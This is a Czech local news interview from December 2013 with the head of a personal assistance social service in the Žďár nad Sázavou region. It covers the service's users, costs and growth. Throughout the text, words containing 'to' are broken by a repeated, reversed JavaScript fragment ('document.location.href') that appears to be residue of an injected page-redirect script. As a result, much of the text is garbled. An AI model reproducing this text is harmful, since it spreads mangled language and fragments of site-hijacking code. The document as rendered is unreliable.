Rainbow page separator

Jaroslava Pavlíčková: Osobní asistence stále zaznamenává nárůst uživatelů

Neděle, 22. prosince 2013

Jaroslavo, vaše služba Osobní asistence je v regionu poměrně mladá. Zkuste ji představit těm, kteří o vás mnoho nevědí?

Naše služba je určena lidem, kteří se z důvodu svého onemocnění nebo postižení nezvládnou postarat o sebe sami. Buď nemají nikoho blízkého nebo je ta[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to péče nad jejich síly a možnosti. Působíme po celém bývalém okrese Žďár nad Sázavou.

Jaroslava Pavlíčková: Osobní asistence stále zaznamenává nárůst uživatelůOsobní asistence bývá čas[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to spojována s pečovatelskou či ošetřovatelskou službou. Jaký je mezi nimi rozdíl?
Osobní asistence a pečovatelská služba jsou služby sociální, tedy není třeba doporučení lékaře a sám uživatel se na ní musí finančně podílet. U ošetřovatelské služby jde o zdravotní péči, kterou potvrzuje lékař. Hrazena je ze zdravotního pojištění. Všechny ty[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to tři služby mohou u jednoho uživatele působit současně a mohou se doplňovat. Pečovatelská služba je vymezena jednotlivými úkony na rozdíl od asistence, která je na místě, když člověk potřebuje obsáhlejší a komplexnější péči.

Kdo vás nejčastěji oslovuje se žádostí o péči?
Naší cílovou skupinou jsou děti od 3 let, dospělí a senioři ze zdravotním postižením nebo dlouhodobým onemocněním. V současné době jsou našimi uživateli nejčastěji senioři s dlouhodobým onemocněním.

Změní se člověku, který se stane příjemcem služby, nějakým způsobem jeho každodenní styl života?
To je hodně individuální. Někdy naše služba navazuje na péči někoho jiného, ať již rodiny nebo jiné služby, takže přibíráme péči a spíše ji rozšiřujeme a hledáme možnosti, jak pečovat ještě lépe. Jindy nastupuje nečekaná situace – úraz, zhoršení zdravotního stavu. To vše přináší velkou změnu jak pro naše uživatele, tak i pro jejich blízké. Pro[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to se snažíme pomoci umožnit žít co nejvíce běžným způsobem života.

A co na vaši službu rodina? Naruší pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnost osobního asistenta společný rodinný život?
Pří[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tomnost asistenta může být pro některé rodiny velmi náročná a velká změna, ale pokud rodina nezvládá péči sama, je třeba dělat nějaké kompromisy. Vždy je důležitá komunikace, vyjasnit si, co je v kompetenci asistenta a co ne, jak má asistent v domácnosti pracovat a také se ozvat, když něco nefunguje a dát šanci k nápravě a změně.

Jakou částkou přispívá uživatel na provoz vaší služby?
Asistence se platí podle hodin a z celkových nákladů na službu je [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to asi jedna čtvrtina. Ceny se liší s ohledem na [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, zda je služba posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tována v pracovní dny či o víkendu a svátcích. Cenu ovlivńuje i délka doby poskytnuté asistence, průměrná částka na hodinu je 80,- Kč.

V jakých lokalitách působíte? Zaznamenáváte v současné době nárůst nebo pokles zájmu o vaši péči?
Jak jsem již zmínila, naše služba funguje po celém bývalém okrese Žďár nad Sázavou.Původně jsme začali službu posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovat na Velkomeziříčsku. Poté jsme pro kvalitnější a dostupnější péči otevřeli pobočku ve Žďáře nad Sázavou a v Bystřici nad

Pernštejnem. V [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to roce zaznamenáváme stále nárůst uživatelů. Urči[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tou roli hraje také [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to, že osobní asistence je v regionu zatím třetím rokem, tedy ji můžeme považovat stále za novou a rozrůstající se.

Blíží se vánoční svátky a nový rok. Máte nějaké přání pro vaše uživatele?
Jedno mám. Asi [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to bude znít banálně, ale přáli bych si, aby lidé naše služby potřebovali co nejméně.

Děkuji za rozhovor.

Lenka Šustrová
19.12.2013